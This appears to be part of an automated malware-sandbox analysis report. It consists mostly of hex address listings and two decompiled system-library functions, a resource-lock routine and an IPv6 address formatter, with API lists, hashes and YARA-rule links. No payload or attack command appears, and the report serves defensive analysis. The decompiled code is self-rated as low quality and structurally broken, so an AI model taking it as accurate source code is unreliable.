                                                                                                                                                        0x023aeb1a
                                                                                                                                                        0x023aeb1f
                                                                                                                                                        0x023aeb27
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb36
                                                                                                                                                        0x02380bea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380bf6
                                                                                                                                                        0x02380c00
                                                                                                                                                        0x02380c03
                                                                                                                                                        0x02380c0b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c0b
                                                                                                                                                        0x023aeaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380a15
                                                                                                                                                        0x02380bb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380bc6
                                                                                                                                                        0x02380bc6
                                                                                                                                                        0x02380bcb
                                                                                                                                                        0x02380c15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c1d
                                                                                                                                                        0x02380c20
                                                                                                                                                        0x02380c21
                                                                                                                                                        0x02380c24
                                                                                                                                                        0x02380c24
                                                                                                                                                        0x02380c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c26
                                                                                                                                                        0x02380bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380bcd
                                                                                                                                                        0x02380b89
                                                                                                                                                        0x02380b89
                                                                                                                                                        0x02380b90
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b96
                                                                                                                                                        0x02380a04
                                                                                                                                                        0x02380a04
                                                                                                                                                        0x02380b9a
                                                                                                                                                        0x02380b9a
                                                                                                                                                        0x02380b9b
                                                                                                                                                        0x02380b9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380ba5
                                                                                                                                                        0x02380ac7
                                                                                                                                                        0x02380aca
                                                                                                                                                        0x023aeacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeade
                                                                                                                                                        0x023aeade
                                                                                                                                                        0x023aeae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeaf3
                                                                                                                                                        0x023aeaf6
                                                                                                                                                        0x023aeaf7
                                                                                                                                                        0x023aeafe
                                                                                                                                                        0x023aeb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeb01
                                                                                                                                                        0x023aeacf
                                                                                                                                                        0x02380ad0
                                                                                                                                                        0x02380ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380ada
                                                                                                                                                        0x02380ae6
                                                                                                                                                        0x02380c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c47
                                                                                                                                                        0x02380c49
                                                                                                                                                        0x02380c4a
                                                                                                                                                        0x02380c4e
                                                                                                                                                        0x02380c51
                                                                                                                                                        0x02380c54
                                                                                                                                                        0x02380c57
                                                                                                                                                        0x02380c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380c60
                                                                                                                                                        0x02380afb
                                                                                                                                                        0x02380afe
                                                                                                                                                        0x02380b02
                                                                                                                                                        0x02380b05
                                                                                                                                                        0x02380b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380b08
                                                                                                                                                        0x02380ae6
                                                                                                                                                        0x02380b44
                                                                                                                                                        0x023809f8
                                                                                                                                                        0x023809f8
                                                                                                                                                        0x023809f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aeaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: 9188c110c4fc0a0b454b7751b2e0eb047c372ec380eba5a1eba69fa239c9b7d8
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: FCA19B7190430AEFDF28EF64C8556BEB7B9EF05308F24846AD852AF281E734964DCB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02380554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E02380554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024201c0;
									_push(_t144);
									_push(0);
									_t51 = E0233F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02384FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02393F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02393F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E023C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02393F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02383915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x024201c0;
												_push(_t138);
												_push(0);
												_t58 = E0233F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02384FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02393F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02393F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E023C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02393F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02383915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02365384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0233F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02383915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0233F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02383915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0233F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02383915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02365329(_t110, _t138);
																_t69 = E023653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                        0x0238055a
                                                                                                                                                        0x0238055d
                                                                                                                                                        0x02380563
                                                                                                                                                        0x02380566
                                                                                                                                                        0x023805d8
                                                                                                                                                        0x023805e2
                                                                                                                                                        0x023805e5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023805e7
                                                                                                                                                        0x023805e7
                                                                                                                                                        0x023805ea
                                                                                                                                                        0x023805f3
                                                                                                                                                        0x023805f3
                                                                                                                                                        0x02380568
                                                                                                                                                        0x02380568
                                                                                                                                                        0x02380568
                                                                                                                                                        0x02380569
                                                                                                                                                        0x02380569
                                                                                                                                                        0x02380569
                                                                                                                                                        0x0238056b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a217f
                                                                                                                                                        0x023a2183
                                                                                                                                                        0x023a225b
                                                                                                                                                        0x023a225f
                                                                                                                                                        0x023a2189
                                                                                                                                                        0x023a218c
                                                                                                                                                        0x023a218f
                                                                                                                                                        0x023a2194
                                                                                                                                                        0x023a2199
                                                                                                                                                        0x023a219d
                                                                                                                                                        0x023a21a0
                                                                                                                                                        0x023a21a2
                                                                                                                                                        0x023a21ce
                                                                                                                                                        0x023a21ce
                                                                                                                                                        0x023a21ce
                                                                                                                                                        0x023a21d0
                                                                                                                                                        0x023a21d6
                                                                                                                                                        0x023a21de
                                                                                                                                                        0x023a21e2
                                                                                                                                                        0x023a21e8
                                                                                                                                                        0x023a21e9
                                                                                                                                                        0x023a21ec
                                                                                                                                                        0x023a21f1
                                                                                                                                                        0x023a21f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21f8
                                                                                                                                                        0x023a21fb
                                                                                                                                                        0x023a2206
                                                                                                                                                        0x023a220b
                                                                                                                                                        0x023a220c
                                                                                                                                                        0x023a2217
                                                                                                                                                        0x023a2226
                                                                                                                                                        0x023a222b
                                                                                                                                                        0x023a222c
                                                                                                                                                        0x023a222f
                                                                                                                                                        0x023a2232
                                                                                                                                                        0x023a2235
                                                                                                                                                        0x023a2235
                                                                                                                                                        0x023a223a
                                                                                                                                                        0x023a223f
                                                                                                                                                        0x023a2241
                                                                                                                                                        0x023a2243
                                                                                                                                                        0x023a2248
                                                                                                                                                        0x023a2248
                                                                                                                                                        0x023a224d
                                                                                                                                                        0x023a224f
                                                                                                                                                        0x023a2262
                                                                                                                                                        0x023a2263
                                                                                                                                                        0x023a2268
                                                                                                                                                        0x023a2269
                                                                                                                                                        0x023a2269
                                                                                                                                                        0x023a2269
                                                                                                                                                        0x023a226d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2276
                                                                                                                                                        0x023a2279
                                                                                                                                                        0x023a227e
                                                                                                                                                        0x023a2283
                                                                                                                                                        0x023a2287
                                                                                                                                                        0x023a228a
                                                                                                                                                        0x023a228d
                                                                                                                                                        0x023a228f
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22bc
                                                                                                                                                        0x023a22be
                                                                                                                                                        0x023a22c4
                                                                                                                                                        0x023a22cc
                                                                                                                                                        0x023a22d0
                                                                                                                                                        0x023a22d6
                                                                                                                                                        0x023a22d7
                                                                                                                                                        0x023a22da
                                                                                                                                                        0x023a22df
                                                                                                                                                        0x023a22e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22e6
                                                                                                                                                        0x023a22e9
                                                                                                                                                        0x023a22f4
                                                                                                                                                        0x023a22f9
                                                                                                                                                        0x023a22fa
                                                                                                                                                        0x023a2305
                                                                                                                                                        0x023a2314
                                                                                                                                                        0x023a2319
                                                                                                                                                        0x023a231a
                                                                                                                                                        0x023a231d
                                                                                                                                                        0x023a2320
                                                                                                                                                        0x023a2323
                                                                                                                                                        0x023a2323
                                                                                                                                                        0x023a2328
                                                                                                                                                        0x023a232d
                                                                                                                                                        0x023a232f
                                                                                                                                                        0x023a2331
                                                                                                                                                        0x023a2336
                                                                                                                                                        0x023a2336
                                                                                                                                                        0x023a233b
                                                                                                                                                        0x023a233d
                                                                                                                                                        0x023a2350
                                                                                                                                                        0x023a2351
                                                                                                                                                        0x023a2356
                                                                                                                                                        0x023a2359
                                                                                                                                                        0x023a2359
                                                                                                                                                        0x023a235b
                                                                                                                                                        0x023a235d
                                                                                                                                                        0x02365367
                                                                                                                                                        0x0236536b
                                                                                                                                                        0x02365372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2363
                                                                                                                                                        0x023a2363
                                                                                                                                                        0x023a2369
                                                                                                                                                        0x023a236a
                                                                                                                                                        0x023a236c
                                                                                                                                                        0x023a2371
                                                                                                                                                        0x023a2373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a2379
                                                                                                                                                        0x023a237a
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a237f
                                                                                                                                                        0x023a2385
                                                                                                                                                        0x023a2386
                                                                                                                                                        0x023a2389
                                                                                                                                                        0x023a238e
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x02365378
                                                                                                                                                        0x0236537c
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2396
                                                                                                                                                        0x023a2397
                                                                                                                                                        0x023a239c
                                                                                                                                                        0x023a23a2
                                                                                                                                                        0x023a23a3
                                                                                                                                                        0x023a23a6
                                                                                                                                                        0x023a23ab
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b3
                                                                                                                                                        0x023a23b4
                                                                                                                                                        0x023a23b9
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23ba
                                                                                                                                                        0x023a23bc
                                                                                                                                                        0x023a23bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399153
                                                                                                                                                        0x02399158
                                                                                                                                                        0x0239915a
                                                                                                                                                        0x0239915e
                                                                                                                                                        0x02399160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399166
                                                                                                                                                        0x02399171
                                                                                                                                                        0x02399176
                                                                                                                                                        0x02399176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02399160
                                                                                                                                                        0x023a23c6
                                                                                                                                                        0x023a23ce
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23d7
                                                                                                                                                        0x023a23ad
                                                                                                                                                        0x023a2390
                                                                                                                                                        0x023a2373
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a233f
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2291
                                                                                                                                                        0x023a2293
                                                                                                                                                        0x023a2295
                                                                                                                                                        0x023a229a
                                                                                                                                                        0x023a22a1
                                                                                                                                                        0x023a22a3
                                                                                                                                                        0x023a22a7
                                                                                                                                                        0x023a22a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22ab
                                                                                                                                                        0x023a22ad
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22af
                                                                                                                                                        0x023a22b1
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b4
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653be
                                                                                                                                                        0x023653c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653cb
                                                                                                                                                        0x023653ce
                                                                                                                                                        0x023653d0
                                                                                                                                                        0x023653d4
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653d8
                                                                                                                                                        0x023653e3
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x023653ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023653d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a22b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a228f
                                                                                                                                                        0x023a2349
                                                                                                                                                        0x023a234d
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2251
                                                                                                                                                        0x023a21a4
                                                                                                                                                        0x023a21a4
                                                                                                                                                        0x023a21a6
                                                                                                                                                        0x023a21a8
                                                                                                                                                        0x023a21ac
                                                                                                                                                        0x023a21b6
                                                                                                                                                        0x023a21b8
                                                                                                                                                        0x023a21bc
                                                                                                                                                        0x023a21be
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c0
                                                                                                                                                        0x023a21c2
                                                                                                                                                        0x023a21c4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c4
                                                                                                                                                        0x023a21c6
                                                                                                                                                        0x023a21c6
                                                                                                                                                        0x023a21c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a21c8
                                                                                                                                                        0x023a21a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023a2183
                                                                                                                                                        0x0238057b
                                                                                                                                                        0x0238057d
                                                                                                                                                        0x02380581
                                                                                                                                                        0x02380583
                                                                                                                                                        0x023a2178
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02380589
                                                                                                                                                        0x0238058f
                                                                                                                                                        0x0238058f
                                                                                                                                                        0x02380583
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023A2206
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                        • API String ID: 885266447-4236105082
                                                                                                                                                        • Opcode ID: b54ce2494444ca91803186c811649c1682bb8f2cabc697d1dbd2c9c37621d35c
                                                                                                                                                        • Instruction ID: 21fce6e99022c3944f155d83388db0d86e61ae713d70bd995eace2f41cd3ee1f
                                                                                                                                                        • Opcode Fuzzy Hash: b54ce2494444ca91803186c811649c1682bb8f2cabc697d1dbd2c9c37621d35c
                                                                                                                                                        • Instruction Fuzzy Hash: 1D5129717003116BEB299A18CC91F6773EAEF95710F218279FD55DF285DA31EC428B90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 023814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E023814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2422088; // 0x7777b0d6
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02377707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02377707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02377707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02342340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0234E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                        0x023814c0
                                                                                                                                                        0x023814cb
                                                                                                                                                        0x023814d2
                                                                                                                                                        0x023814d6
                                                                                                                                                        0x023814da
                                                                                                                                                        0x023814de
                                                                                                                                                        0x023814e3
                                                                                                                                                        0x0238157a
                                                                                                                                                        0x0238157a
                                                                                                                                                        0x023814f1
                                                                                                                                                        0x023814f3
                                                                                                                                                        0x023aea0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aea15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x023aea15
                                                                                                                                                        0x023814f9
                                                                                                                                                        0x023814f9
                                                                                                                                                        0x023814fe
                                                                                                                                                        0x02381504
                                                                                                                                                        0x023aea1a
                                                                                                                                                        0x023aea1f
                                                                                                                                                        0x023aea21
                                                                                                                                                        0x023aea22
                                                                                                                                                        0x023aea27
                                                                                                                                                        0x023aea2a
                                                                                                                                                        0x023aea2a
                                                                                                                                                        0x02381515
                                                                                                                                                        0x02381517
                                                                                                                                                        0x0238156d
                                                                                                                                                        0x02381572
                                                                                                                                                        0x02381575
                                                                                                                                                        0x02381575
                                                                                                                                                        0x0238151e
                                                                                                                                                        0x023aea50
                                                                                                                                                        0x023aea55
                                                                                                                                                        0x023aea58
                                                                                                                                                        0x023aea58
                                                                                                                                                        0x0238152e
                                                                                                                                                        0x02381531
                                                                                                                                                        0x02381533
                                                                                                                                                        0x00000000
                                                                                                                                                        0x02381535
                                                                                                                                                        0x02381541
                                                                                                                                                        0x02381549
                                                                                                                                                        0x02381549
                                                                                                                                                        0x02381533
                                                                                                                                                        0x023814f3
                                                                                                                                                        0x02381559

                                                                                                                                                        APIs
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 023AEA22
                                                                                                                                                          • Part of subcall function 023813CB: ___swprintf_l.LIBCMT ref: 0238146B
                                                                                                                                                          • Part of subcall function 023813CB: ___swprintf_l.LIBCMT ref: 02381490
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0238156D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
